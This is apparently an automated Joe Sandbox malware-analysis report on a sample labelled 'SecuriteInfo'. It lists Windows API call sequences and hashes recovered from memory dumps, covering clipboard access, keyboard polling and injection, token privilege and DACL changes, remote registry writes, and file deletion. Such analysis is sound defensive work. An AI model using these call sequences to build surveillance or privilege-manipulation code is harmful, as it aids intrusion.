                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 6b5b43f1cc8ab8cf2c757d539664c204df415b16cbec2a896973d4f92ceb9eb6
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 5931AF71A00105DFCB18EE58D480969F7A6FB59380B68CAA5E40ACB651DB75EEC1CBC0
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 036C22B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 32bb5deb83ee176186f045d23f18d460589b28842bd9c83adbf974aa223303f9
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 98E0E67494020EDFDB00EFB8D5496AE7FB4EF04701F1005A5FD01D2280D6309D508A72
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007DCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCF00
                    • SendMessageW.USER32 ref: 007DCF29
                    • _wcsncpy.LIBCMT ref: 007DCFA1
                    • GetKeyState.USER32(00000011), ref: 007DCFC2
                    • GetKeyState.USER32(00000009), ref: 007DCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCFE5
                    • GetKeyState.USER32(00000010), ref: 007DCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DD018
                    • SendMessageW.USER32 ref: 007DD03F
                    • SendMessageW.USER32(?,00001030,?,007DB602), ref: 007DD145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DD15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DD16E
                    • SetCapture.USER32(?), ref: 007DD177
                    • ClientToScreen.USER32(?,?), ref: 007DD1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DD1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DD203
                    • ReleaseCapture.USER32 ref: 007DD20E
                    • GetCursorPos.USER32(?), ref: 007DD248
                    • ScreenToClient.USER32(?,?), ref: 007DD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD2B1
                    • SendMessageW.USER32 ref: 007DD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD31C
                    • SendMessageW.USER32 ref: 007DD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD37B
                    • GetCursorPos.USER32(?), ref: 007DD39B
                    • ScreenToClient.USER32(?,?), ref: 007DD3A8
                    • GetParent.USER32(?), ref: 007DD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD431
                    • SendMessageW.USER32 ref: 007DD462
                    • ClientToScreen.USER32(?,?), ref: 007DD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD51A
                    • SendMessageW.USER32 ref: 007DD53D
                    • ClientToScreen.USER32(?,?), ref: 007DD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD5C3
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 3977979337-4164748364
                    • Opcode ID: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                    • Instruction ID: dd6fb6bbbb91a6a51723c0a86d7caba234147e1f3c135aa906ac42d2e08f79a3
                    • Opcode Fuzzy Hash: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                    • Instruction Fuzzy Hash: 28428C70209251AFD722CF28C848AAABBF5FF48314F14452EF696973A1D739D854CF92
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007D873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: 45f68b02b3abb11207cb1b5f9a2f517cda42529fac4481fd3e3eeeb78c8860da
                    • Instruction ID: 4421318b62d5a929ca149abecdc773add703dab6dd4ed697e70e832e496413e4
                    • Opcode Fuzzy Hash: 45f68b02b3abb11207cb1b5f9a2f517cda42529fac4481fd3e3eeeb78c8860da
                    • Instruction Fuzzy Hash: F812E471501208EFEB658F68CC49FAE7BB8EF45710F14812AF916EA2E1DF789941CB11
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oav$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-3379304892
                    • Opcode ID: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                    • Instruction ID: 6e3956deca3e1ea21a2e7347570d878dd05f40e8d75d4ea51f75d0d99c68a7b0
                    • Opcode Fuzzy Hash: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                    • Instruction Fuzzy Hash: BC93A371E04215DFDB28CF58C8817ADB7B1FF89314F24826AE945EB281E7799E81CB50
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00754A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078DA8E
                    • IsIconic.USER32(?), ref: 0078DA97
                    • ShowWindow.USER32(?,00000009), ref: 0078DAA4
                    • SetForegroundWindow.USER32(?), ref: 0078DAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078DAC4
                    • GetCurrentThreadId.KERNEL32 ref: 0078DACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078DAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0078DAF8
                    • SetForegroundWindow.USER32(?), ref: 0078DAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB10
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB25
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB33
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB42
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB47
                    • SetForegroundWindow.USER32(?), ref: 0078DB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 0078DB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                    • Instruction ID: 90e7a6d64bad194c5cb69a1dd240ac80b3016d617f9e79d83e3a82c7d2f91f26
                    • Opcode Fuzzy Hash: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                    • Instruction Fuzzy Hash: 7E317571A81318BBEB306FA19C49F7E3F7CEB44B50F158066FA06E61D0C6B45D10ABA5
                    APIs
                      • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                      • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                      • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                    • _memset.LIBCMT ref: 007A889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A88ED
                    • CloseHandle.KERNEL32(?), ref: 007A88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A8915
                    • GetProcessWindowStation.USER32 ref: 007A892E
                    • SetProcessWindowStation.USER32(00000000), ref: 007A8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A8952
                      • Part of subcall function 007A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                      • Part of subcall function 007A8713: CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    APIs
                    • OpenClipboard.USER32(007DF910), ref: 007C4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007C4292
                    • GetClipboardData.USER32(0000000D), ref: 007C429A
                    • CloseClipboard.USER32 ref: 007C42A6
                    • GlobalLock.KERNEL32(00000000), ref: 007C42C2
                    • CloseClipboard.USER32 ref: 007C42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007C42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007C42EE
                    • GetClipboardData.USER32(00000001), ref: 007C42F6
                    • GlobalLock.KERNEL32(00000000), ref: 007C4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007C4337
                    • CloseClipboard.USER32 ref: 007C4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007BC9F8
                    • FindClose.KERNEL32(00000000), ref: 007BCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BCAAF
                    • __swprintf.LIBCMT ref: 007BCAFB
                    • __swprintf.LIBCMT ref: 007BCB3E
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • __swprintf.LIBCMT ref: 007BCB92
                      • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                    • __swprintf.LIBCMT ref: 007BCBE0
                      • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 00773953
                      • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 0077396B
                    • __swprintf.LIBCMT ref: 007BCC2F
                    • __swprintf.LIBCMT ref: 007BCC7E
                    • __swprintf.LIBCMT ref: 007BCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007BF221
                    • _wcscmp.LIBCMT ref: 007BF236
                    • _wcscmp.LIBCMT ref: 007BF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 007BF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 007BF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007BF291
                    • FindClose.KERNEL32(00000000), ref: 007BF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF2B8
                    • _wcscmp.LIBCMT ref: 007BF2DF
                    • _wcscmp.LIBCMT ref: 007BF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF308
                    • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF330
                    • FindClose.KERNEL32(00000000), ref: 007BF33D
                    • FindClose.KERNEL32(00000000), ref: 007BF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 007D103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007BF37E
                    • _wcscmp.LIBCMT ref: 007BF393
                    • _wcscmp.LIBCMT ref: 007BF3AA
                      • Part of subcall function 007B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D9
                    • FindClose.KERNEL32(00000000), ref: 007BF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF400
                    • _wcscmp.LIBCMT ref: 007BF427
                    • _wcscmp.LIBCMT ref: 007BF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF450
                    • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF478
                    • FindClose.KERNEL32(00000000), ref: 007BF485
                    • FindClose.KERNEL32(00000000), ref: 007BF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    APIs
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                      • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                      • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                      • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                      • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                      • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                      • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A825B
                    • _memset.LIBCMT ref: 007A8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A828F
                    • GetLengthSid.ADVAPI32(?), ref: 007A82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007A82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A82F9
                    • GetLengthSid.ADVAPI32(?), ref: 007A8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8325
                    • HeapAlloc.KERNEL32(00000000), ref: 007A832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A834D
                    • CopySid.ADVAPI32(00000000), ref: 007A8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oav$UCP)$UTF)$UTF16)$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                    • API String ID: 0-3342537335
                    APIs
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0737
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007B0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 007B02C2
                    • GetKeyState.USER32(000000A0), ref: 007B02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 007B02F7
                    • GetKeyState.USER32(000000A1), ref: 007B030C
                    • GetAsyncKeyState.USER32(00000011), ref: 007B0324
                    • GetKeyState.USER32(00000011), ref: 007B0336
                    • GetAsyncKeyState.USER32(00000012), ref: 007B034E
                    • GetKeyState.USER32(00000012), ref: 007B0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 007B0378
                    • GetKeyState.USER32(0000005B), ref: 007B038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oav$VUUU$VUUU$VUUU$VUUU$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                    • API String ID: 0-1081084498
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    APIs
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                      • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 007B3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B3B87
                    • MoveFileW.KERNEL32(?,?), ref: 007B3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF6AB
                    • Sleep.KERNEL32(0000000A), ref: 007BF6DB
                    • _wcscmp.LIBCMT ref: 007BF6EF
                    • _wcscmp.LIBCMT ref: 007BF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 007BF7A8
                    • FindClose.KERNEL32(00000000), ref: 007BF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                    • Instruction ID: 6a1eeff9e22e7230752f429604ede2883f35007aa7f224377cc4a0972c51421d
                    • Opcode Fuzzy Hash: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                    • Instruction Fuzzy Hash: E141707190020AEFCF15DF64CC89BEEBBB4FF05710F5485A6E815A2291DB389E44CB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 908977ac688b8b35e945a67afe5d86de4dbff0d1789d15fe79f008180561086e
                    • Instruction ID: df4e14fdc6165f643afb969a555d05934ab19062105f9e9f75421fdec3502098
                    • Opcode Fuzzy Hash: 908977ac688b8b35e945a67afe5d86de4dbff0d1789d15fe79f008180561086e
                    • Instruction Fuzzy Hash: 26127970A00609DFDF14DFA4D985AEEB7B5FF48300F108669E806E7251EB39AD25DB90
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • _memmove.LIBCMT ref: 007A062F
                    • _memmove.LIBCMT ref: 007A0744
                    • _memmove.LIBCMT ref: 007A07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZv
                    • API String ID: 1300846289-1565780762
